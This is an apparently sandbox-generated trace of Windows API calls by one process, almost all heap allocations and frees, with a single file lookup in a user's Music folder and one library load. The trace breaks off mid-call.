[0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0205.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0205.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0205.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0205.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0205.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0205.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0205.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0205.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0205.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0205.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0205.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0205.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.785] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\E6IDgLQGE97MYwh0a.wav", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf53dd50, ftCreationTime.dwHighDateTime=0x1d5c9ae, ftLastAccessTime.dwLowDateTime=0x62440750, ftLastAccessTime.dwHighDateTime=0x1d5cd9e, ftLastWriteTime.dwLowDateTime=0x62440750, ftLastWriteTime.dwHighDateTime=0x1d5cd9e, nFileSizeHigh=0x0, nFileSizeLow=0xce48, dwReserved0=0x0, dwReserved1=0x0, cFileName="E6IDgLQGE97MYwh0a.wav", cAlternateFileName="E6IDGL~1.WAV")) returned 0x9e2078 [0205.785] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0205.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.786] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0205.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0205.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0205.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0205.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.787] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.787] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.787] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.787] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0205.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.787] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.788] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.788] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.788] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0205.788] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0205.788] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0205.789] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0205.789] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0205.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0205.790] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0205.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0205.790] CharUpperBuffW (in: 